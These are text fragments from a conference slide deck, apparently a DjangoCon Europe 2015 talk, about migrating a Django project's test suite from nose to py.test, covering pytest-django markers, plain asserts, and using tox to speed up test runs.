mark a test as an elasticsearch test. Locally, for the current folder and children: declare fixtures, plugins, hooks Ugly. But easy.Ugly. But easy. import pytest, os def pytest_configure(): # Shortcut to using DJANGO_SETTINGS_MODULE=... py.test os.environ['DJANGO_SETTINGS_MODULE'] = 'settings_test' # There's a lot of python path hackery done in our manage.py import manage # noqa There's many included plugins, but also community plugins: --create-db, fixtures (rf, client, admin_client...) --cov myproj tests/ --lf -n NUM I confess. I have a sweet tooth. --reuse-db --create-db Good for my mental healthGood for my mental health [pytest] addopts = --reuse-db @pytest.mark.django_db def test_with_db(self): # function/method @pytest.mark.django_db class TestFoo(TestCase): # class Anyway, who needs a DB nowadays, right?Anyway, who needs a DB nowadays, right? pytestmark = pytest.mark.django_db # module Use simple asserts No camelCase, eg self.assertEqual assert 1 == 2vs self.assertEqual(1, 2) assert Truevs self.assertTrue(True) assert not Nonevs self.assertIsNotNone(None) self.assertAbstractSingletonProxyFactoryBean. Just joking. Or am I? Why not take advantage of something that Naming is hard. vs + test No dependency injection (and not parametrization) for nose classes But we can still use the autouse fixtures (fixtures on steroids) No (data) fixture bundling ( django-nose feature), so slower test runs, but Django 1.8 test case data setup and possibility to run Travis builds in parallelNo big deal. 248 It's going to take some time find . -name test* | wc -l 472 Wow, a lot of time ag "class Test" | wc -l 3626 Oops. ag "def test_" | wc -l 6210 Switching is hard, let's go shopping. ag "self.assert|ok_|eq_" | wc -l py.test versus Nice eh? I told you so. REUSE_DB=1 python manage.py test --noinput --logging-clear-handlers --with-id Added @pytest.mark.django_db on our base TestCase Added pytestmark = pytest.mark.django_db in 35 files that needed it I'm still hoping I'll be able to use this feature one day.I'm still hoping I'll be able to use this feature one day. def pytest_collection_modifyitems(items): for item in items: item.keywords['django_db'] = pytest.mark.django_db Missing calls to super() in the (setUp|tearDown)(class), leading to code/data leaks in the following tests. Ugly PYTHONPATH hacks in the manage.py file. I puked in my mouth.I puked in my mouth. import manage.py @pytest.fixture(autouse=True, scope='session') def _load_testapp(): installed_apps = getattr(settings, 'INSTALLED_APPS') setattr(settings, 'INSTALLED_APPS', installed_apps + extra_apps) django.db.models.loading.cache.loaded = False tox randomizes the PYTHONHASHSEED by default on each run. And suddenly you realize your tests were expecting the dicts to be ordered! Need to fix tests: With py.test, tox and travis, it's a piece of cake From more than 50 minutes down to less than 20I know 20 minutes is slow. But it's LESS slow. pip install pytest && py.test learn py.test: slides: more excuses!
https://agopian.info/presentations/2015_06_djangocon_europe/?full
CC-MAIN-2022-40
refinedweb
718
61.73
CodePlexProject Hosting for Open Source Software hello, I am having a problem with blogengine on my website. After I install it everything works perfect for a few days and then somehow after a few days it is like the CSS does not want to load and I am also no longer able to see the posts in the admin section. I have to place a backup back to my hosting and delete and create a new database, also place a backup back into the database and it works again for like 3 days and then it does the same. For example right now it is broken again for me: Does anyone know why this keeps happening? I use the latest version by the automatic Microsoft web app function. Looks like you have some problem with MediaElementPlayer extension conflicting with jQuery. Try to disable MediaElementPlayer and see if it will help. Thank you for the reply, I have disabled the MediaElementPlayer but it still will not load tit correctly somehow. Just to edit it also does not show anything in the admin panel I did make a screenshot: And not sure if it helps I use MSSQL 2008 database, it is really strange because it works good every time for 3 days and then it does this and not sure why. *EDIT* I removed all posts except a very basic hello one, but that does not solve it either and I disabled all extensions now. Something must be really weird because I can load the theme like this: Another thing you can do is in "advanced" settings uncheck http compression and trim stylesheets. Did also not seem to happen, when I disable it and then save it is like the database doesnt update, when I go back to the page it will show it enabled again. Well I removed everything and I started from scratch so I will see if it keeps working now. ;) Thanks anyway for all your help! I will post if it does it again ^^ It broke again after 1 day: Is there maybe something wrong with the MSSQL connection? or is it really a style-sheet problem, because I notice it doesnt wane update anything in control panel so that must mean it is not updating the database. Not really sure what is wrong because my forum also does run on another MSSQL database and that has no problem. Well I will make a test blog in MySQL to see if that is any better. Really odd. I doubted it is database issue, I'd try to upgrade to latest development build that uses .net 4.0. Were could I download this? I checked the website and under planned it does not show anything. Is there a special place? Sorry maybe I am just blind :) *edit* Never mind I found it (^.^) thanks I am going to try this out directly. I'm having the same problem--most of the admin pages are not listing their contents, including Posts, Comments, Users, etc. It appears to be related to a javascript error that's getting thrown when those pages load, Uncaught TypeError: Object [object Object] has no method 'setTemplateURL' This same exception happens in different places for different pages; for the Posts management page the top of the stacktrace is at /Scripts/jquery-1.5.1.min.js:16 I tried manually including a <script> reference to every javascript file on the site, and that didn't fix it. Could it have something to do with script handlers or something in the 4.0 web.config? I am running the site otherwise successfully, using BlogEngine.NET 2.0.0.36 on ASP.NET 4.0. I did NOT recompile the BlogEngine Core 3.5 DLL to 4.0, though like I said, the rest of the site has been running correctly. I also experienced the behavior where it worked correctly for a few days and then stopped. It is working incorrectly consistently across two development environments (Windows 7 Ultimate + IIS7.5, Windows 7 Professional + IIS 7.5) and one production environment (EC2 Windows Server 2008 R2 + IIS7.5) I have been playing around with your latest release (34ca9fe0c061) but I cannot get it to work, I keep getting stuck at a error, I am not really a expert on coding itself :) not sure if you can see what it means? I left it on my site it has a bunch of more information to much to post here. 3: using System.Data; Line 4: Line 5: using BlogEngine.Core; Line 6: using BlogEngine.Core.Web.Controls; Line 7: using BlogEngine.Core.Web.Extensions; Line 3: using System.Data; Line 4: Line 5: using BlogEngine.Core; Line 6: using BlogEngine.Core.Web.Controls; Line 7: using BlogEngine.Core.Web.Extensions; Source File: wwwroot\App_Code\Extensions\BBCode.cs Line: 5 I found out that the issue is somewhere in the SQLServer.NET_4.0_Web.Config that you need to use for MSSQL, if you use the default xml database Web.Config the blog runs perfect however if I swap to the MSSQL database and use the provided SQLServer.NET_4.0_Web.Config above (i change it to Web.Config) it will provide a error. *edit* Also tried to rebuild the project then it does give another erro when using mssql: Description: An error occurred during the compilation of a resource required to service this request. Please review the following specific error details and modify your source code appropriately. Compiler Error Message: CS0234: The type or namespace name 'Html' does not exist in the namespace 'System.Web.WebPages' (are you missing an assembly reference?) Source Error: Line 3: using System.Linq; Line 4: using System.Web; Line 5: using System.Web.WebPages.Html; Line 6: using System.Text.RegularExpressions; Line 7: using System.Web.UI; Line 3: using System.Linq; Line 4: using System.Web; Line 5: using System.Web.WebPages.Html; Line 6: using System.Text.RegularExpressions; Line 7: using System.Web.UI; Source File: wwwroot\App_Code\Helpers\RazorHelpers.cs Line: 5 Web.config for XML and MSSql should be almost identical, only default providers changed from XML to SQL in 3 places. You can use XML config if it works for you and just manually change default providers from XML to DB. Razor error is because you don't have web pages installed on your server (or workstation). It usually installed into global cache with MVC 3 or Webmatrix. If not, you need copy all DLLs from downloaded /lib/Razor folder into web site's /bin. I was curious about something, are the usernames and passwords stored in a MSSQL database (if you use this) or still in a XML file? Update on my problem (again, same symptoms, probably different cause:) While tweaking my project, I had added some additional .js files to /Scripts/ (for jQuery UI.) Apparently, somewhere along the line, BlogEngine scans the /Scripts folder and automatically adds each script to each page via the script handler (js.axd). The scripts I added, which I did not intend to add to the admin pages, got added anyways and caused a collision somewhere along the line. I moved my scripts (different version of jquery and jquery UI) to a /Scripts-Custom folder instead of /Scripts and now it all works as expected. Script references are added by the ScriptModule.. See web.config entry <add name="ScriptModule" type="System.Web.Handlers.ScriptModule, System.Web.Extensions, Version=3.
http://blogengine.codeplex.com/discussions/260663
CC-MAIN-2017-22
refinedweb
1,245
65.73
package Carp; { use 5.006; } use strict; use warnings; BEGIN { # Very old versions of warnings.pm load Carp. This can go wrong due # to the circular dependency. If warnings is invoked before Carp, # then warnings starts by loading Carp, then Carp (above) tries to # invoke warnings, and gets nothing because warnings is in the process # of loading and hasn't defined its import method yet. If we were # only turning on warnings ("use warnings" above) this wouldn't be too # bad, because Carp would just gets the state of the -w switch and so # might not get some warnings that it wanted. The real problem is # that we then want to turn off Unicode warnings, but "no warnings # 'utf8'" won't be effective if we're in this circular-dependency # situation. So, if warnings.pm is an affected version, we turn # off all warnings ourselves by directly setting ${^WARNING_BITS}. # On unaffected versions, we turn off just Unicode warnings, via # the proper API. if(!defined($warnings::VERSION) || eval($warnings::VERSION) < 1.06) { ${^WARNING_BITS} = ""; } else { "warnings"->unimport("utf8"); } } sub _fetch_sub { # fetch sub without autovivifying my($pack, $sub) = @_; $pack .= '::'; # only works with top-level packages return unless exists($::{$pack}); for ($::{$pack}) { return unless ref \$_ eq 'GLOB' && *$_{HASH} && exists $$_{$sub}; for ($$_{$sub}) { return ref \$_ eq 'GLOB' ? *$_{CODE} : undef } } } # UTF8_REGEXP_PROBLEM is a compile-time constant indicating whether Carp # must avoid applying a regular expression to an upgraded (is_utf8) # string. There are multiple problems, on different Perl versions, # that require this to be avoided. All versions prior to 5.13.8 will # load utf8_heavy.pl for the swash system, even if the regexp doesn't # use character classes. Perl 5.6 and Perls [5.11.2, 5.13.11) exhibit # specific problems when Carp is being invoked in the aftermath of a # syntax error. BEGIN { if("$]" < 5.013011) { *UTF8_REGEXP_PROBLEM = sub () { 1 }; } else { *UTF8_REGEXP_PROBLEM = sub () { 0 }; } } # is_utf8() is essentially the utf8::is_utf8() function, which indicates # whether a string is represented in the upgraded form (using UTF-8 # internally). As utf8::is_utf8() is only available from Perl 5.8 # onwards, extra effort is required here to make it work on Perl 5.6. BEGIN { if(defined(my $sub = _fetch_sub utf8 => 'is_utf8')) { *is_utf8 = $sub; } else { # black magic for perl 5.6 *is_utf8 = sub { unpack("C", "\xaa".$_[0]) != 170 }; } } # The downgrade() function defined here is to be used for attempts to # downgrade where it is acceptable to fail. It must be called with a # second argument that is a true value. BEGIN { if(defined(my $sub = _fetch_sub utf8 => 'downgrade')) { *downgrade = \&{"utf8::downgrade"}; } else { *downgrade = sub { my $= 5.007_003 ? eval(q(sub ($) { my $u = utf8::native_to_unicode($_[0]); $u >= 0x20 && $u <= 0x7e; })) : ord("A") == 65 ? sub ($) { $_[0] >= 0x20 && $_[0] <= 0x7e } : sub ($) { # Early EBCDIC # 3 EBCDIC code pages supported then; all controls but one # are the code points below SPACE. The other one is 0x5F on # POSIX-BC; FF on the other two. # FIXME: there are plenty of unprintable codepoints other # than those that this code and the comment above identifies # as "controls". $_[0] >= ord(" ") && $_[0] <= 0xff && $_[0] != (ord ("^") == 106 ? 0x5f : 0xff); } ; } sub _univ_mod_loaded { return 0 unless exists($::{"UNIVERSAL::"}); for ($::{"UNIVERSAL::"}) { return 0 unless ref \$_ eq "GLOB" && *$_{HASH} && exists $$_{"$_[0]::"}; for ($$_{"$_[0]::"}) { return 0 unless ref \$_ eq "GLOB" && *$_{HASH} && exists $$_{"VERSION"}; for ($$_{"VERSION"}) { return 0 unless ref \$_ eq "GLOB"; return ${*$_{SCALAR}}; } } } } # _maybe_isa() is usually the UNIVERSAL::isa function. We have to avoid # the latter if the UNIVERSAL::isa module has been loaded, to avoid infi- # nite recursion; in that case _maybe_isa simply returns true. my $isa; BEGIN { if (_univ_mod_loaded('isa')) { *_maybe_isa = sub { 1 } } else { # Since we have already done the check, record $isa for use below # when defining _StrVal. *_maybe_isa = $isa = _fetch_sub(UNIVERSAL => "isa"); } } # We need an overload::StrVal or equivalent function, but we must avoid # loading any modules on demand, as Carp is used from __DIE__ handlers and # may be invoked after a syntax error. # We can copy recent implementations of overload::StrVal and use # overloading.pm, which is the fastest implementation, so long as # overloading is available. If it is not available, we use our own pure- # Perl StrVal. We never actually use overload::StrVal, for various rea- # sons described below. # overload versions are as follows: # undef-1.00 (up to perl 5.8.0) uses bless (avoid!) # 1.01-1.17 (perl 5.8.1 to 5.14) uses Scalar::Util # 1.18+ (perl 5.16+) uses overloading # The ancient 'bless' implementation (that inspires our pure-Perl version) # blesses unblessed references and must be avoided. Those using # Scalar::Util use refaddr, possibly the pure-Perl implementation, which # has the same blessing bug, and must be avoided. Also, Scalar::Util is # loaded on demand. Since we avoid the Scalar::Util implementations, we # end up having to implement our own overloading.pm-based version for perl # 5.10.1 to 5.14. Since it also works just as well in more recent ver- # sions, we use it there, too. BEGIN { if (eval { require "overloading.pm" }) { *_StrVal = eval 'sub { no overloading; "$_[0]" }' } else { # Work around the UNIVERSAL::can/isa modules to avoid recursion. # _mycan is either UNIVERSAL::can, or, in the presence of an # override, overload::mycan. *_mycan = _univ_mod_loaded('can') ? do { require "overload.pm"; _fetch_sub overload => 'mycan' } : \&UNIVERSAL::can; # _blessed is either UNIVERAL::isa(...), or, in the presence of an # override, a hideous, but fairly reliable, workaround. *_blessed = $isa ? sub { &$isa($_[0], "UNIVERSAL") } : sub { my $= 5.015002 || ("$]" >= 5.014002 && "$]" < 5.015) || ("$]" >= 5.012005 && "$]" < 5.013)) { *CALLER_OVERRIDE_CHECK_OK = sub () { 1 }; } else { *CALLER_OVERRIDE_CHECK_OK = sub () { 0 }; } } sub caller_info { my $i = shift(@_) + 1; my %call_info; my $cgc = _cgc(); { # Some things override caller() but forget to implement the # @DB::args part of it, which we need. We check for this by # pre-populating @DB::args with a sentinel which no-one else # has the address of, so that we can detect whether @DB::args # has been properly populated. However, on earlier versions # of perl this check tickles a bug in CORE::caller() which # leaks memory. So we only check on fixed perls. @DB::args = \$i if CALLER_OVERRIDE_CHECK_OK; package DB; @call_info{ qw(pack file line sub has_args wantarray evaltext is_require) } = $cgc ? $cgc->($i) : caller($i); } unless ( defined $call_info{file} ) { return (); } my $sub_name = Carp::get_subname( \%call_info ); if ( $call_info{has_args} ) { # Guard our serialization of the stack from stack refcounting bugs # NOTE this is NOT a complete solution, we cannot 100% guard against # these bugs. However in many cases Perl *is* capable of detecting # them and throws an error when it does. Unfortunately serializing # the arguments on the stack is a perfect way of finding these bugs, # even when they would not affect normal program flow that did not # poke around inside the stack. Inside of Carp.pm it makes little # sense reporting these bugs, as Carp's job is to report the callers # errors, not the ones it might happen to tickle while doing so. # See: # and: # for more details and discussion. - Yves my @args = map { my $arg; local $@= $@; eval { $arg = $_; 1; } or do { $. Carp gives two ways to control this. =over 4 =item 1. For objects, a method, C<CARP_TRACE>, will be called, if it exists. If this method doesn't exist, or it recurses into C<Carp>, or it otherwise throws an exception, this is skipped, and Carp moves on to the next option, otherwise checking stops and the string returned is used. It is recommended that the object's type is part of the string to make debugging easier. =item 2. For any type of reference, C<$Carp::RefArgFormatter> is checked (see below). This variable is expected to be a code reference, and the current parameter is passed in. If this function doesn't exist (the variable is undef), or it recurses into C<Carp>, or it otherwise throws an exception, this is skipped, and Carp moves on to the next option, otherwise checking stops and the string returned is used. =item 3. Otherwise, if neither C<CARP_TRACE> nor C<$Carp::RefArgFormatter> is available, stringify the value ignoring any overloading. =back =head1 GLOBAL VARIABLES =head2 $Carp::MaxEvalLen This variable determines how many characters of a string-eval are to be shown in the output. Use a value of C<0> to show all text. Defaults to C<0>. =head2 $Carp::MaxArgLen This variable determines how many characters of each argument to a function to print. Use a value of C<0> to show the full length of the argument. Defaults to C<64>. =head2 $Carp::MaxArgNums This variable determines how many arguments to each function to show. Use a false value to show all arguments to a function call. To suppress all arguments, use C<-1> or C<'0 but true'>. Defaults to C<8>. =head2 $Carp::Verbose This variable makes C<carp()> and C<croak()> generate stack backtraces just like C<cluck()> and C<confess()>. This is how C<use Carp 'verbose'> is implemented internally. Defaults to C<0>. =head2 $Carp::RefArgFormatter This variable sets a general argument formatter to display references. Plain scalars and objects that implement C<CARP_TRACE> will not go through this formatter. Calling C<Carp> from within this function is not supported. local $Carp::RefArgFormatter = sub { require Data::Dumper; Data::Dumper::Dump($_[0]); # not necessarily safe }; =head2 @CARP_NOT This variable, I<in your package>, says which packages are I<not> to be considered as the location of an error. The C<carp()> and C<Carp> report the error as coming from a caller not in C<My::Carping::Package>, nor from C<My::Friendly::Caller>. Also read the L</DESCRIPTION> section above, about how C<Carp> decides where the error is reported from. Use C<@CARP_NOT>, instead of C<$Carp::CarpLevel>. Overrides C<Carp>'s use of C<@ISA>. =head2 %Carp::Internal This says what packages are internal to Perl. C.) =head2 %Carp::CarpInternal This says which packages are internal to Perl's warning system. For generating a full stack backtrace this is the same as being internal to Perl, the stack backtrace will not start inside packages that are listed in C<%Carp::CarpInternal>. But it is slightly different for the summary message generated by C<carp> or C<croak>. There errors will not be reported on any lines that are calling packages in C<%Carp::CarpInternal>. For example C<Carp> itself is listed in C<%Carp::CarpInternal>. Therefore the full stack backtrace from C<confess> will not start inside of C<Carp>, and the short message from calling C<croak> is not placed on the line where C<croak> was called. =head2 $Carp::CarpLevel This variable determines how many additional call frames are to be skipped that would not otherwise be when reporting where an error occurred on a call to one of C<Carp> goes all of the way through the call stack, realizes that something is wrong, and then generates a full stack backtrace. If they are unlucky then the error is reported from somewhere misleading very high in the call stack. Therefore it is best to avoid C<$Carp::CarpLevel>. Instead use C<@CARP_NOT>, C<%Carp::Internal> and C<%Carp::CarpInternal>. Defaults to C<0>. =head1 BUGS The Carp routines don't handle exception objects currently. If called with a first argument that is a reference, they simply call die() or warn(), as appropriate. =head1 SEE ALSO L<Carp::Always>, L<Carp::Clan> =head1 CONTRIBUTING L<Carp> is maintained by the perl 5 porters as part of the core perl 5 version control repository. Please see the L<perlhack> perldoc for how to submit patches and contribute to it. =head1 AUTHOR The Carp module first appeared in Larry Wall's perl 5.000 distribution. Since then it has been modified by several of the perl 5 porters. Andrew Main (Zefram) <zefram@fysh.org> divested Carp into an independent distribution. =head1 COPYRIGHT Copyright (C) 1994-2013 Larry Wall Copyright (C) 2011, 2012, 2013 Andrew Main (Zefram) <zefram@fysh.org> =head1 LICENSE This module is free software; you can redistribute it and/or modify it under the same terms as Perl itself.
https://web-stage.metacpan.org/dist/Carp/source/lib/Carp.pm
CC-MAIN-2021-31
refinedweb
2,022
65.62
Bugtraq mailing list archives version I was using, as xlock does not seem to contain version information in the binary and I don't have the original source. The overflow is in the -name parameter, and it is fixed in xlockmore-4.01, available on sunsite in /pub/Linux/X11/screensavers/xlockmore-4.01.tgz . Other platforms have not been checked for this, and while this is an older version of xlock, many systems seem to come preloaded with this version. Also, xlock does not need to be suid root unless it is running on a machine with shadowed passwords, so another possible fix it chmod u-s xlock. /* x86 XLOCK overflow exploit by cesaro () 0wned org 4/17/97 Original exploit framework - lpr exploit Usage: make xlock-exploit xlock-exploit <optional_offset> Assumptions: xlock is suid root, and installed in /usr/X11/bin */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #define DEFAULT_OFFSET 50 #define BUFFER_SIZE 996 long get_esp(void) { __asm__("movl %esp,%eax\n"); } int main(int argc, char *argv[]) { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int dfltOFFSET = DEFAULT_OFFSET; u_char execshell[] = ""; int i; if (argc > 1) dfltOFFSET = atoi(argv[1]); else printf("You can specify another offset as a parameter if you need...\n"); buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i<2;i++) *(addr_ptr++) = get_esp() + dfltOFFSET; ptr = (char *)addr_ptr; *ptr = 0; execl("/usr/X11/bin/xlock", "xlock", "-nolock", "-name", buff, NULL); } By Date By Thread
http://seclists.org/bugtraq/1997/Apr/113
CC-MAIN-2014-15
refinedweb
276
51.07
wctype.h - wide-character classification and mapping utilities #include <wctype.h> The <wctype.h> header defines the following data types through - wint_t - As described in <wchar.h>. - wctrans_t A scalar type that can hold values which represent locale-specific character mappings.A scalar type that can hold values which represent locale-specific character mappings. - wctype_t - As described in <wchar.h>. The <wctype.h> header declares the following as functions and may also define them as macros. Function prototypes must be provided for use with an ISO C compiler. int iswalnum(wint_t); int iswalpha *); <wctype.h> defines the following macro name: - WEOF - Constant expression of type wint_t that is returned by several MSE functions to indicate end-of-file. For all functions described in this header that accept an argument of type wint_t, the value will be representable as a wchar_t or will equal the value of WEOF. If this argument has any other value, the behaviour is undefined. The behaviour of these functions is affected by the LC_CTYPE category of the current locale. Inclusion of the <wctype.h> header may make visible all symbols from the headers <ctype.h>, <stdio.h>, <stdarg.h>, <stdlib.h>, <string.h>, <stddef.h> <time.h>. and <wchar.h>. None. None. iswalnum(), iswalpha(), iswcntrl(), iswctype(), iswdigit(), iswgraph(), iswlower(), iswprint(), iswpunct(), iswspace(), iswupper(), iswxdigit(), setlocale(), towctrans(), towlower(), towupper(), wctrans(), wctype(), <locale.h>. <wchar.h>.
http://www.opengroup.org/onlinepubs/007908799/xsh/wctype.h.html
crawl-001
refinedweb
228
50.12
Issues when using Qt Quick Compiler (Qt 5.5.0 for Embedded) Are there tutorials on how to efficiently work with the Qt Quick Compiler? Or are there recommended coding styles to get the most advantage from it? I got the Qt Quick Compiler 3.x (later referred to as 'QtQC') running for our i.MX53 board, great (see here). But new issues occurred concerning imports in QML and the expected performance gain, not so great. Problem 1: It appears to have become necessary to put namespaces onto imports in QML files, even for files in the same folder. Otherwise some classes where not found on program start. Solution: import "../common" should be turned into something like import "../common" as Common import "./" as Local and all used classes need to be prefixed with Common.MyClassAor Local.MyClassB. After this restructuring, the program startet as if it was built without QtQC, fine. Problem 2: No notable performance gain, the program takes about two minutes (!) until it is operable, which is about the same time as without QtQC. Solution attempt: Maybe dynamic creation of objects with Loaders and 'createComponent' cause unclear dependencies during compile time and force the program to recompile all QML code behind the given URLs on program start? So I removed all occasions of those and replaced them with static instances of all needed classes, so all dependencies are clear during compile time. But still no speed-up, program still takes about two minutes to start. Any suggestions? Regards, Konstantin Dols - SGaist Lifetime Qt Champion Hi, The Qt Quick Compiler being a Licensed Feature, you should try to contact the Qt Company directly through your Qt Account page. You can also try the interest mailing list
https://forum.qt.io/topic/58208/issues-when-using-qt-quick-compiler-qt-5-5-0-for-embedded
CC-MAIN-2018-17
refinedweb
287
65.73
CodePlexProject Hosting for Open Source Software Hello! A few days ago I found this physics engine and I must say that it is incredibly good. It is easy to understand and use except for one thing, how to create water simulation! I have tried to find a simple explanation of how to do this but have not succeeded, so therefore I write here and ask how to do it. I'm using XNA 3.1 and was thinking to start with a simple question and then take one piece at a time. I want the water to have the same position, width and height of this rectangle (0,900,1920,180) This is the box that will react with the water: boxBody = BodyFactory.Instance.CreateRectangleBody (physics simulator, 190, 190, 1); boxBody.Position = new Vector2 (400, 100); boxGeom = GeomFactory.Instance.CreateRectangleGeom (physics simulator, boxBody, 190, 190); boxGeom.FrictionCoefficient = 1f; I just want to have a rectangular area at the moment and do not need any waves right now. So if anyone would help me, I'd be very grateful. / / CptBonex Hey, I've been wondering the same thing as well, specially since I happened upon this video on YouTube recently: There doesn't seem to be any official documentation/tutorials on how to do fluids/water, and I'd really like to be able to implement something simple like that video for my game at some point. Just a rectangular area, like CptBonex mentioned above, but also with the ability to have waves... Anyone have any ideas/sample code to help out with this? Many thanks in advance. Have either of you looked at the WaterSampleXNA or WaterSampleSilverlight? That should be a good example of how to get water working in your games. @ Matt: Oh ok, gotcha. Didn't know about the new examples in the latest source revision. Will take a look and hopefully work it out. Thanks! :-) @ CptBonex: In case you're still missing out, grab the latest source version of the Engine (65093) from here: and then after unpacking the files, navigate to "FarseerPhysics-65093\Samples\FP2.1\WaterSampleXNA\". Compile and run the solution to have a play around, and then check out the code to see how it works. Please let me know if this helped you. Yup, from the looks of the example (WaterSampleXNA), that's pretty much what I need, and so should make it fairly easy to integrate it within my framework. Not that I needed it immediately, but figured it would be good to get it sorted out early. Many thanks, Matt! :-) Ok i got it working but i got one smal problem. I have made a class that makes it esier to create the water and it works perfect when I set effect.view to my default matrix. and when i use my camera class matrix, then the water is being drawn whitout the alpha. why is that so and how do i fix that? Here is my water.draw method: public void Draw(GraphicsDevice graphicsDevice, Matrix worldMatrix, Matrix cameraMatrix, Matrix projectionMatrix) { graphicsDevice.RenderState.CullMode = CullMode.CullCounterClockwiseFace; //ScreenManager.GraphicsDevice.RenderState.FillMode = FillMode.WireFrame; // create the triangle strip CreateWaterVertexBuffer(); // set the devices vertex declaration NOTICE - the vertex type is the same as we use when we create the vertex buffer graphicsDevice.VertexDeclaration = new VertexDeclaration(graphicsDevice, VertexPositionColor.VertexElements); // create a basic effect with no pool BasicEffect effect = new BasicEffect(graphicsDevice, null); // set the effects matrix's effect.World = worldMatrix; effect.View = cameraMatrix; effect.Projection = projectionMatrix; effect.Alpha = 0.5f; // this effect supports a blending mode effect.VertexColorEnabled = true; // we must enable vertex coloring with this effect effect.Begin(); foreach (EffectPass pass in effect.CurrentTechnique.Passes) { pass.Begin(); graphicsDevice.DrawUserPrimitives(PrimitiveType.TriangleStrip, vertices, 0, waterModel.WaveController.NodeCount); pass.End(); } effect.End(); } Here is the matrix that works: cameraMatrix = Matrix.Identity; And here is my camera class and the _transform matrix that makes the alpha go away: public class Camera2d { public float _zoom; // Camera Zoom public Matrix _transform; // Matrix Transform public Vector2 _pos; // Camera Position public float _rotation; // Camera Rotation public Camera2d() { _zoom = 1.0f; _rotation = 0.0f; _pos = Vector2.Zero; } // Sets and gets zoom public float Zoom { get { return _zoom; } set { _zoom = value; if (_zoom < 0.1f) _zoom = 0.1f; } // Negative zoom will flip image } public void Rotation(float rotation) { _rotation = rotation; } // Auxiliary function to move the camera public void Move(Vector2 amount) { _pos = amount; } // Get set position public Vector2 Pos { get { return _pos; } set { _pos = value; } } public Matrix get_transformation(GraphicsDevice graphicsDevice) { _transform = Matrix.CreateTranslation(new Vector3(-_pos.X, -_pos.Y, 0)) * Matrix.CreateRotationZ(MathHelper.ToRadians(_rotation)) * Matrix.CreateScale(new Vector3(Zoom, Zoom, 0)) * Matrix.CreateTranslation(new Vector3(1920 * 0.5f, 1080 * 0.5f, 0)); return _transform; } } Help me! Camera transformations shouldn't have anything to do with whether or not alpha is enabled. Write up a quick sample app demonstrating the problem. Just comment whee you think your changes cause problems. I'll take a look and solve this problem for you. Are you sure you want to delete this post? You will not be able to recover it later. Are you sure you want to delete this thread? You will not be able to recover it later.
http://farseerphysics.codeplex.com/discussions/207592
CC-MAIN-2017-26
refinedweb
864
50.63
When it is required to print the numbers in a given range without using any loop, a method is defined, that keeps displays numbers from higher range by uniformly decrementing it by one after every print statement. Below is the demonstration of the same − def print_nums(upper_num): if(upper_num>0): print_nums(upper_num-1) print(upper_num) upper_lim = 6 print("The upper limit is :") print(upper_lim) print("The numbers are :") print_nums(upper_lim) The upper limit is : 6 The numbers are : 1 2 3 4 5 6 A method named ‘print_nums’ is defined. It checks if the upper limit is greater than 0. If so, keeps displaying the elements. After every display, the upper range value is decremented by 1. Outside the function, a value for upper limit is defined. This method is called by passing the parameter. The output is displayed on the console.
https://www.tutorialspoint.com/python-program-to-print-numbers-in-a-range-1-upper-without-using-any-loops
CC-MAIN-2021-39
refinedweb
142
63.19
How to run a code in lopy stored on SD card? Dear all, I believe this is trivial question but I would be more than happy if you can help me to run a .py file stored on SD card connected to expansion board with lopy. I tried to find an answer in previous posts but got a bit confused.. Thank you in advance! Monika @robert-hh great thank you it worked perfectly! @monersss You have to mount the SD card first, e.g. with: from os import mount, chdir from machine import SD sd = SD() mount(sd, '/sd') Then you can chdir into /sd: chdir("/sd") and import the module, or directly import import /sd/mymodule
https://forum.pycom.io/topic/1930/how-to-run-a-code-in-lopy-stored-on-sd-card
CC-MAIN-2022-21
refinedweb
117
82.65
Goal: This tutorial shows how to set up JDK 6 and JavaFX on older Intel Macs (old means 32-bit CPUs from around 2006). The problem is that JavaFX requires JDK 6, but Apple only released the Apple JDK 6 for Mac OS X 10.5/Leopard with 64-bit CPUs. We will use the SoyLatte JDK 6 instead. The tutorial also covers how to set up the NetBeans IDE as tool for JDK 6 and JavaFX development on Mac OS X. Target group: This tutorial is for JDK 6 developers who are stuck on an older system with Requirements: Basic understanding of NetBeans, Java, and how to use the Terminal (X11.app) is required. The command line examples are for the bash shell. Optional tip from Landon Fuller: The Java homes on Macs are in the /System/Library/Frameworks/JavaVM.framework directory. The following symlinks will trick Mac OS and some other applications into using the new JDK. mkdir /System/Library/Frameworks/JavaVM.framework/Versions/1.6.0/ ln -s /System/Library/Frameworks/JavaVM.framework/Versions/1.6.0/ /System/Library/Frameworks/JavaVM.framework/Versions/1.6 ln -s /sw/soylatte16-i386-1.0.2/ /System/Library/Frameworks/JavaVM.framework/Versions/1.6.0/Home Open the X11.app and set it up to use the new JDK. Mac:$ export JAVA_HOME=/sw/soylatte16-i386-1.0.2 Mac:$ export PATH=/sw/soylatte16-i386-1.0.2/bin:$PATH Test whether you were successful: Mac:$ echo $PATH /sw/soylatte16-i386-1.0.2/bin:/sw/bin:/sw/sbin:/usr/bin: /bin:/usr/sbin:/sbin:/usr/local/bin:/usr/X11/bin:/usr/X11R6/bin Mac:$ java -version java version "1.6.0_03-p3" Java(TM) SE Runtime Environment (build 1.6.0_03-p3-landonf_03_feb_2008_02_12-b00) Java HotSpot(TM) Client VM (build 1.6.0_03-p3-landonf_03_feb_2008_02_12-b00, mixed mode) Mac:$ which java /sw/soylatte16-i386-1.0.2/bin/java Mac:$ which javac /sw/soylatte16-i386-1.0.2/bin/javac If the terminal replies with the old values /usr/bin/java or java version 1.5.0_13, go back and check whether you missed a step. Don't close this Terminal window before Completing the Set-up: Saving Settings for the Terminal. You can now use the JDK 6 from the Terminal. Below you will see how to set up the NetBeans IDE to use the JDK 6. You can skip this step if you don't develop JavaFX. If you solely want the JDK 6, continue with setting up the NetBeans IDE below. Mac:$ open "/Volumes/JavaFX SDK/javafx_sdk-1_0-pre1.mpkg" Test whether the installation was successful: Mac:$ which javafx /usr/bin/javafx Mac:$ which javafxc /usr/bin/javafxc Try to compile and run a Hello World application. Save this code as file Hello.fx import javafx.application.Frame; import javafx.application.Stage; import javafx.scene.geometry.Circle; import javafx.scene.paint.Color; Frame { title: "Hello World" width: 200 height: 200 visible: true stage: Stage { content: Circle { centerX: 100, centerY: 100 radius: 40 fill: Color.YELLOW } } } 